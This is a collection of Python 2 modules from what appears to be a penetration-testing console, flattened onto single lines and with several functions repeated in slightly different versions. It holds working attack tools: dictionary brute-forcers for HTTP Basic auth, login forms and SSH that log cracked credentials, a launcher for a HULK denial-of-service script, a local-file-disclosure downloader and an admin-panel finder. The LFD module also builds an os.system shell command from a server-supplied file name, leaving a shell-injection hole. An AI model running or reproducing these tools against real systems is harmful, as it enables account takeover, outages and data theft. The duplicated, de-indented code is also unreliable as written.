def wuis(run): try: global defaulthost, defaultport if run != 1: actions = raw_input(d.prompt("web/whois")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.space() elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: w = whois.whois(defaulthost) if w: wd = w.__dict__ for k, v in wd.items(): print('%20s\t"%s"' % (k, v)) print "" except: Errors.Errors(event=sys.exc_info(), info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) wuis(0)
def wuis(run): try: global defaulthost,defaultport if run!=1: actions=raw_input(d.prompt("web/whois")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) d.space() elif actions[0:10] == "set target": defaulthost=defaulthost.replace("http://", "") defaulthost=ping.update(defaulthost,actions,"target") d.change("target",defaulthost) elif actions[0:8] == "set port": defaultport=ping.update(defaultport,actions,"port") d.change("port",defaultport) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: try: w = whois.whois(defaulthost) if w: wd = w.__dict__ for k, v in wd.items(): print('%20s\t"%s"' % (k, v)) print "" except: Errors.Errors(event=sys.exc_info(), info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost+":"+defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) wuis(0)
def wuis(run): try: global defaulthost,defaultport if run!=1: actions=raw_input(d.prompt("web/whois")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] d.change("target",defaulthost) wuis(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: try: w = whois.whois(defaulthost) if w: wd = w.__dict__ for k, v in wd.items(): print('%20s\t"%s"' % (k, v)) print "" except(KeyboardInterrupt): d.kbi() exit() except: d.off() else: d.nocommand() except: d.kbi() exit() wuis(0)
def wuis(run): try: global defaulthost, defaultport if run != 1: actions = raw_input(d.prompt("web/whois")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] d.change("target", defaulthost) wuis(0) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: w = whois.whois(defaulthost) if w: wd = w.__dict__ for k, v in wd.items(): print('%20s\t"%s"' % (k, v)) print "" except (KeyboardInterrupt): d.kbi() exit() except: d.off() else: d.nocommand() except: d.kbi() exit() wuis(0)
def dosweb(run): try: global defaulthost,defaultport if run!=1: actions=raw_input(d.prompt("web/dos")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target",defaulthost) dosweb(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port",defaultport) dosweb(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: try: subprocess.call('python "files/hulk/hulk.py" http://'+defaulthost, shell=True) except(KeyboardInterrupt): d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() dosweb(0)
def xjoomla(run): try: global defaulthost, defaultport if run != 1: actions = raw_input(d.prompt("web/joomscan")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] d.change("target", defaulthost) xjoomla(0) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: subprocess.call( 'cd /usr/share/joomscan/;./joomscan.pl -u ' + defaulthost, shell=True) except (KeyboardInterrupt): d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() xjoomla(0)
def xjoomla(run): try: global defaulthost, defaultport if run != 1: actions = raw_input(d.prompt("web/joomscan")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] d.change("target", defaulthost) xjoomla(0) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: subprocess.call("cd /usr/share/joomscan/;./joomscan.pl -u " + defaulthost, shell=True) except (KeyboardInterrupt): d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() xjoomla(0)
def httpbt(run): try: global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2 if run != 1: actions = raw_input(d.prompt("web/httpbt")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("patch", "yes", "Folder or dir", defaultpach) d.descrip("user", "yes", "Username", defaultuser) d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2) print "" elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:9] == "set patch": defaultpach = ping.update(defaultpach, actions, "patch") d.change("patch", defaultpach) elif actions[0:8] == "set user": defaultuser = ping.update(defaultuser, actions, "user") d.change("user", defaultuser) elif actions[0:10] == "set dict_1": defaultdic2 = ping.update(defaultdic2, actions, "dict_1") d.change("dict_1", defaultdic2) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: red = socket.socket(socket.AF_INET, socket.SOCK_STREAM) red.connect((defaulthost, int(defaultport))) try: d.loading_file() try: with open(defaultdic2, 'r') as passs: for ps in passs: ps = ps.replace("\n", "") red.send("GET " + defaultpach + " HTTP/1.1\r\n") red.send("HOST: " + defaulthost + "\r\n") red.send("Authorization:Basic " + base64.b64encode(defaultuser + ":" + ps) + "\r\n\r\n") last = red.recv(1000) if last.find("401") <= 0: ping.savethree("BruteForceHTTP", defaulthost, defaultport, defaultpach, defaultuser, ps) d.Success(defaultuser, ps) red.close httpbt(0) else: print " " + Alr + " Checking (username="******")(password="******")" red.close except: Errors.Errors(event=sys.exc_info()[0], info=defaultdic2) except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) httpbt(0)
def LFDconsole(run): global defaulthost, defaultfile, defaultport try: if run != 1: actions = raw_input(d.prompt("web/lfd-con")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP, DNS Target", defaulthost) d.descrip("patch", "yes", "Path file vul", defaultfile) d.descrip("port", "no", "Port service", defaultport) d.space() LFDconsole(0) elif actions[0:9] == "set patch": defaultfile = ping.update(defaultfile, actions, "patch") d.change("patch", defaultfile) elif actions[0:10] == "set target": defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: connection = httplib.HTTPConnection( defaulthost, defaultport) connection.request("GET", defaultfile) response = connection.getresponse() if response.status == 200: print " " + Suf + " File response correctly." d.space() print "\n " + Hlp + " LFD Console help\n" print " ------------------------------------------" print " |" + colors[6] + "Command " + colors[ 0] + "| " + colors[6] + "Description" + colors[ 0] + " | " + colors[6] + "Examples" + colors[ 0] + " |" print " ------------------------------------------" print " | get | Download file | get index.php |" print " ------------------------------------------" d.space() command = 0 while command != "exit": command = raw_input(d.Client_prompt("LFD")) if command[:3] == "get": submit = command[4:] try: url = "http://" + defaulthost + defaultfile + "?" + submit file_name = url.split('/')[-1] u = urllib2.urlopen(url) f = open("tmp/" + file_name, 'wb') meta = u.info() try: file_size = int( meta.getheaders("Content-Length") [0]) if file_size != 0: print " " + Alr + " Downloading %s Bytes: %s" % ( file_name, file_size) file_size_dl = 0 block_sz = 8192 while True: buffer = u.read(block_sz) if not buffer: break file_size_dl += len(buffer) f.write(buffer) status = r"%10d [%3.2f%%]" % ( file_size_dl, file_size_dl * 100. / file_size) status = status + chr(8) * ( len(status) + 1) print " " + Suf + " Completed " + status f.close() print " \n -------------------------------- File " + file_name + " Size: " + str( file_size) + " \n" os.system("cat 'tmp/" + file_name + "' -b -v ") os.system("rm 'tmp/" + file_name + "'") print " \n -------------------------------- File " + file_name + " Size: " + str( file_size) + " \n" else: print " " + War + " File empy or no exist." except: Errors.Errors(event=sys.exc_info(), info=url) except: Errors.Errors(event=sys.exc_info(), info=defaulthost + ":" + defaultport) else: print " " + Bad + " File Not response correctly." d.space() except: Errors.Errors(event=sys.exc_info(), info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info(), info=False) LFDconsole(0)
def httpformbasebruteforce(run): try: global defaulthost,defaultport,defaultpach,defaultdic1,defaultdic2,defaultdat1,defaultdat2,defaultmeth,defaultcont if run!=1: actions=raw_input(d.prompt("web/formbt")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) d.descrip("patch","yes","Folder or dir",defaultpach) d.descrip("para_1","yes","Parameter 1",defaultdat1) d.descrip("para_2","yes","Parameter 2",defaultdat2) d.descrip("method","yes","POST or GET",defaultmeth) d.descrip("condit","yes","[if!=]No Logged",defaultcont) d.descrip("dict_1","yes","Dictionary user",defaultdic1) d.descrip("dict_2","yes","Dictionary pass",defaultdic2) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target",defaulthost) httpformbasebruteforce(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port",defaultport) httpformbasebruteforce(0) elif actions[0:9] == "set patch": defaultpach = actions[10:] d.change("patch",defaultpach) httpformbasebruteforce(0) elif actions[0:10] == "set condit": defaultcont = actions[11:] d.change("condit",defaultcont) httpformbasebruteforce(0) elif actions[0:10] == "set dict_1": defaultdic1 = actions[11:] d.change("dict_1",defaultdic1) httpformbasebruteforce(0) elif actions[0:10] == "set dict_2": defaultdic2 = actions[11:] d.change("dict_1",defaultdic2) httpformbasebruteforce(0) elif actions[0:10] == "set para_1": defaultdat1 = actions[11:] d.change("para_1",defaultdat1) httpformbasebruteforce(0) elif actions[0:10] == "set para_2": defaultdat2 = actions[11:] d.change("para_2",defaultdat2) httpformbasebruteforce(0) elif actions[0:10] == "set method": defaultmeth = actions[11:] d.change("method",defaultmeth) httpformbasebruteforce(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: try: d.loading() try: with open(defaultdic1,'r') as user: for us in user: try: with open(defaultdic2,'r') as passs: for ps in passs: us=us.replace("\n","") ps=ps.replace("\n","") params = urllib.urlencode({defaultdat1: us, defaultdat2: ps}) header={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"} conn = httplib.HTTPConnection(defaulthost,defaultport) conn.request(defaultmeth, defaultpach, params, header) response = conn.getresponse() ver_source = response.read() if ver_source.find(defaultcont) != 0: log=open('core/logs/logsBruteForce.log','a') log.write('\n ===================================== ') log.write('\n Module : BruteForceFormBase') log.write('\n Data : '+time.strftime('%c')) log.write('\n target : '+defaulthost) log.write('\n path : '+defaultpach) log.write('\n method : '+defaultmeth) log.write('\n Cracked : ('+defaultdat1+' : '+us+' , '+defaultdat2+' : '+ps+')') log.close() print "\n-["+colors[2]+"*"+colors[0]+"] Successfully with ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")\n" httpformbasebruteforce(0) else: print " ["+colors[4]+"!"+colors[0]+"] Checking ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")" except: d.filenot() httpformbasebruteforce(0) except: d.filenot() httpformbasebruteforce(0) except: d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() httpformbasebruteforce(0)
def httpbt(run): try: global defaulthost,defaultport,defaultpach,defaultdic1,defaultdic2 if run!=1: actions=raw_input(d.prompt("web/httpbt")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) d.descrip("patch","yes","Folder or dir",defaultpach) d.descrip("dict_1","yes","Dictionary user",defaultdic1) d.descrip("dict_2","yes","Dictionary pass",defaultdic2) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target",defaulthost) httpbt(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port",defaultport) httpbt(0) elif actions[0:9] == "set patch": defaultpach = actions[10:] d.change("patch",defaultpach) httpbt(0) elif actions[0:10] == "set dict_1": defaultdic1 = actions[11:] d.change("dict_1",defaultdic1) httpbt(0) elif actions[0:10] == "set dict_2": defaultdic2 = actions[11:] d.change("dict_1",defaultdic2) httpbt(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: red=socket.socket(socket.AF_INET, socket.SOCK_STREAM) red.connect((defaulthost, int(defaultport))) try: d.loading() try: with open(defaultdic1,'r') as user: for us in user: try: with open(defaultdic2,'r') as passs: for ps in passs: us=us.replace("\n","") ps=ps.replace("\n","") red.send("GET "+defaultpach+" HTTP/1.1\r\n") red.send("HOST: "+defaulthost+"\r\n") red.send("Authorization:Basic "+base64.b64encode(us+":"+ps)+"\r\n\r\n") last=red.recv(1000) if last.find("401")<=0: log=open('core/logs/logsBruteForce.log','a') log.write('\n ===================================== ') log.write('\n Module : BruteForceHTTP') log.write('\n Data : '+time.strftime('%c')) log.write('\n target : '+defaulthost) log.write('\n port : '+defaultport) log.write('\n patch : '+defaultpach) log.write('\n Cracked : username : '******' , password : '+ps) log.close() d.sucess(us,ps) red.close httpbt(0) else: print " ["+colors[4]+"!"+colors[0]+"] Checking (username="******")(password="******")" red.close except: d.filenot() httpbt(0) except: d.filenot() httpbt(0) except: d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() httpbt(0)
def cmysql(run): global defaulthost, defaultport, defaultuser, defaultpass try: if run != 1: actions = raw_input(d.prompt("clt/sql")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("user", "yes", "Username", defaultuser) d.descrip("pass", "yes", "Password", defaultpass) d.space() cmysql(0) elif actions[0:10] == "set target": defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:8] == "set user": defaultuser = ping.update(defaultuser, actions, "user") d.change("user", defaultuser) elif actions[0:8] == "set pass": defaultpass = ping.update(defaultpass, actions, "pass") d.change("pass", defaultpass) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: con = MySQLdb.connect(defaulthost, defaultuser, defaultpass, "") if True: try: cmd = "nop" print "\n " + Hlp + " SQL Client help\n" print " -------------------------------------------------------------------------------------------------------" print " |" + colors[6] + "Commd" + colors[ 0] + " | " + colors[ 6] + "Description" + colors[ 0] + " | " + colors[ 6] + "Examples" + colors[ 0] + " |" print " -------------------------------------------------------------------------------------------------------" print " |show databases | list databases | show databases |" print " |use | select database | use user_table |" print " |show tables | list tables | show tables |" print " |create database | create databases| create database USERS | " print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | " print " |drop database | drop databases | drop database USERS | " print " |drop table | drop tables | drop table EMAIL | " print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | " print " |update | update data | update EMAILS set name='Willy' where id=1 | " print " |select | select data | select id, name from EMAILS | " print " -------------------------------------------------------------------------------------------------------" print "" while (cmd != "exit"): cmd = raw_input(d.Client_prompt('sql')) cur = con.cursor() try: tor = cur.execute(cmd) if True: for x in range(tor): print cur.fetchone() except: print " " + Bad + " No command '" + cmd + "' found" except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info(), info=defaulthost + ":" + defaultport) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) cmysql(0)
def httpformbasebruteforce(run): try: global defaulthost,defaultport,defaultpach,defaultdic1,defaultdic2,defaultdat1,defaultdat2,defaultmeth,defaultcont if run!=1: actions=raw_input(d.prompt("web/formbt")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) d.descrip("patch","yes","Folder or dir",defaultpach) d.descrip("para_1","yes","Parameter 1",defaultdat1) d.descrip("para_2","yes","Parameter 2",defaultdat2) d.descrip("method","yes","POST or GET",defaultmeth) d.descrip("condit","yes","[if!=]No Logged",defaultcont) d.descrip("dict_1","yes","Dictionary user",defaultdic1) d.descrip("dict_2","yes","Dictionary pass",defaultdic2) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target",defaulthost) httpformbasebruteforce(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port",defaultport) httpformbasebruteforce(0) elif actions[0:9] == "set patch": defaultpach = actions[10:] d.change("patch",defaultpach) httpformbasebruteforce(0) elif actions[0:10] == "set condit": defaultcont = actions[11:] d.change("condit",defaultcont) httpformbasebruteforce(0) elif actions[0:10] == "set dict_1": defaultdic1 = actions[11:] d.change("dict_1",defaultdic1) httpformbasebruteforce(0) elif actions[0:10] == "set dict_2": defaultdic2 = actions[11:] d.change("dict_1",defaultdic2) httpformbasebruteforce(0) elif actions[0:10] == "set para_1": defaultdat1 = actions[11:] d.change("para_1",defaultdat1) httpformbasebruteforce(0) elif actions[0:10] == "set para_2": defaultdat2 = actions[11:] d.change("para_2",defaultdat2) httpformbasebruteforce(0) elif actions[0:10] == "set method": defaultmeth = actions[11:] d.change("method",defaultmeth) httpformbasebruteforce(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: try: d.loading() try: with open(defaultdic1,'r') as user: for us in user: try: with open(defaultdic2,'r') as passs: for ps in passs: us=us.replace("\n","") ps=ps.replace("\n","") params = urllib.urlencode({defaultdat1: us, defaultdat2: ps}) header={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"} conn = httplib.HTTPConnection(defaulthost,defaultport) conn.request(defaultmeth, defaultpach, params, header) response = conn.getresponse() ver_source = response.read() if ver_source.find(defaultcont) != 0: log=open('core/logs/logsBruteForce.log','a') log.write('\n ===================================== ') log.write('\n Module : BruteForceFormBase') log.write('\n Data : '+time.strftime('%c')) log.write('\n target : '+defaulthost) log.write('\n path : '+defaultpach) log.write('\n method : '+defaultmeth) log.write('\n Cracked : ('+defaultdat1+' : '+us+' , '+defaultdat2+' : '+ps+')') log.close() print "\n-["+colors[2]+"*"+colors[0]+"] Successfully with ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")\n" httpformbasebruteforce(0) else: print " ["+colors[4]+"!"+colors[0]+"] Checking ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")" except: d.filenot(defaultdic2) httpformbasebruteforce(0) except: d.filenot(defaultdic1) httpformbasebruteforce(0) except: d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() httpformbasebruteforce(0)
def httpbt(run): try: global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2 if run != 1: actions = raw_input(d.prompt("web/httpbt")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("patch", "yes", "Folder or dir", defaultpach) d.descrip("user", "yes", "Username", defaultuser) d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2) print "" elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:9] == "set patch": defaultpach = ping.update(defaultpach, actions, "patch") d.change("patch", defaultpach) elif actions[0:8] == "set user": defaultuser = ping.update(defaultuser, actions, "user") d.change("user", defaultuser) elif actions[0:10] == "set dict_1": defaultdic2 = ping.update(defaultdic2, actions, "dict_1") d.change("dict_1", defaultdic2) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: red = socket.socket(socket.AF_INET, socket.SOCK_STREAM) red.connect((defaulthost, int(defaultport))) try: d.loading_file() try: with open(defaultdic2, "r") as passs: for ps in passs: ps = ps.replace("\n", "") red.send("GET " + defaultpach + " HTTP/1.1\r\n") red.send("HOST: " + defaulthost + "\r\n") red.send( "Authorization:Basic " + base64.b64encode(defaultuser + ":" + ps) + "\r\n\r\n" ) last = red.recv(1000) if last.find("401") <= 0: ping.savethree( "BruteForceHTTP", defaulthost, defaultport, defaultpach, defaultuser, ps ) d.Success(defaultuser, ps) red.close httpbt(0) else: print " " + Alr + " Checking (username="******")(password="******")" red.close except: Errors.Errors(event=sys.exc_info()[0], info=defaultdic2) except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) httpbt(0)
def btssh(run): try: global defaulthost, defaultport, defaultuser, defaultdicc if run != 1: actions = raw_input(d.prompt("bt/ssh")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("user", "yes", "Username", defaultuser) d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc) print "" btssh(0) elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target", defaulthost) btssh(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port", defaultport) btssh(0) elif actions[0:8] == "set user": defaultuser = actions[9:] d.change("user", defaultuser) btssh(0) elif actions[0:10] == "set dict_1": defaultdicc = actions[11:] d.change("dict_1", defaultdicc) btssh(0) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: d.loading() try: with open(defaultdicc, "r") as passs: for ps in passs: ps = ps.replace("\n", "") try: connect = pxssh.pxssh() connect.login(defaulthost, defaultuser, ps) if True: ping.save("BruteForceSSH", defaulthost, defaultport, defaultuser, ps) print "\n-" + Suf + " Successfully with (" + defaultuser + "=" + ps + ")\n" return 1 except: print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")" except: d.filenot(defaultdicc) btpop3(0) except: d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() btssh(0)
def LFDconsole(run): global defaulthost,defaultfile,defaultport try: if run!=1: actions=raw_input(d.prompt("web/lfd-con")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP, DNS Target",defaulthost) d.descrip("patch","yes","Path file vul",defaultfile) d.descrip("port","no","Port service",defaultport) d.space() LFDconsole(0) elif actions[0:9] == "set patch": defaultfile=ping.update(defaultfile,actions,"patch") d.change("patch",defaultfile) elif actions[0:10] == "set target": defaulthost=ping.update(defaulthost,actions,"target") d.change("target",defaulthost) elif actions[0:8] == "set port": defaultport=ping.update(defaultport,actions,"port") d.change("port",defaultport) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: connection = httplib.HTTPConnection(defaulthost,defaultport) connection.request("GET",defaultfile) response = connection.getresponse() if response.status == 200: print " "+Suf+" File response correctly." d.space() print "\n "+Hlp+" LFD Console help\n" print " ------------------------------------------" print " |"+colors[6]+"Command "+colors[0]+"| "+colors[6]+"Description"+colors[0]+" | "+colors[6]+"Examples"+colors[0]+" |" print " ------------------------------------------" print " | get | Download file | get index.php |" print " ------------------------------------------" d.space() command=0 while command!="exit": command=raw_input(d.Client_prompt("LFD")) if command[:3] == "get": submit=command[4:] try: url = "http://"+defaulthost+defaultfile+"?"+submit file_name = url.split('/')[-1] u = urllib2.urlopen(url) f = open("tmp/"+file_name, 'wb') meta = u.info() try: file_size = int(meta.getheaders("Content-Length")[0]) if file_size != 0: print " "+Alr+" Downloading %s Bytes: %s" % (file_name, file_size) file_size_dl = 0 block_sz = 8192 while True: buffer = u.read(block_sz) if not buffer: break file_size_dl += len(buffer) f.write(buffer) status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size) status = status + chr(8)*(len(status)+1) print " "+Suf+" Completed "+status f.close() print " \n -------------------------------- File "+file_name+" Size: "+str(file_size)+" \n" os.system("cat 'tmp/"+file_name+"' -b -v ") os.system("rm 'tmp/"+file_name+"'") print " \n -------------------------------- File "+file_name+" Size: "+str(file_size)+" \n" else: print " "+War+" File empy or no exist." except: Errors.Errors(event=sys.exc_info(), info=url) except: Errors.Errors(event=sys.exc_info(), info=defaulthost+":"+defaultport) else: print " "+Bad+" File Not response correctly." d.space() except: Errors.Errors(event=sys.exc_info(), info=defaulthost+":"+defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info(), info=False) LFDconsole(0)
def adminfinder(run): try: global defaulthost,defaultport,defaultdicc if run!=1: actions=raw_input(d.prompt("web/cpfinder")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target",defaulthost) adminfinder(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port",defaultport) adminfinder(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: try: with open(defaultdicc,'r') as dirt: results="" resultn="" for patch in dirt: patch=patch.replace("\n","") patch = "/" + patch connection = httplib.HTTPConnection(defaulthost,defaultport) connection.request("GET",patch) response = connection.getresponse() if response.status == 200 or response.status == 301: print " ["+colors[2]+"+"+colors[0]+"] Response "+patch results="-["+colors[2]+"*"+colors[0]+"]"+patch+"\n"+results resultn=patch+","+resultn else: print " ["+colors[4]+"!"+colors[0]+"] Checking..."+colors[0]+patch if results != "": print "\n"+results log=open('core/logs/logsAdminFinder.log','a') log.write('\n ===================================== ') log.write('\n Module : Admin Finder') log.write('\n Data : '+time.strftime('%c')) log.write('\n target : '+defaulthost) log.write('\n port : '+defaultport) log.write('\n found : '+resultn) log.close() else: print "\n ["+colors[1]+"-"+colors[0]+"] Not Found CP\n" except: d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() adminfinder(0)
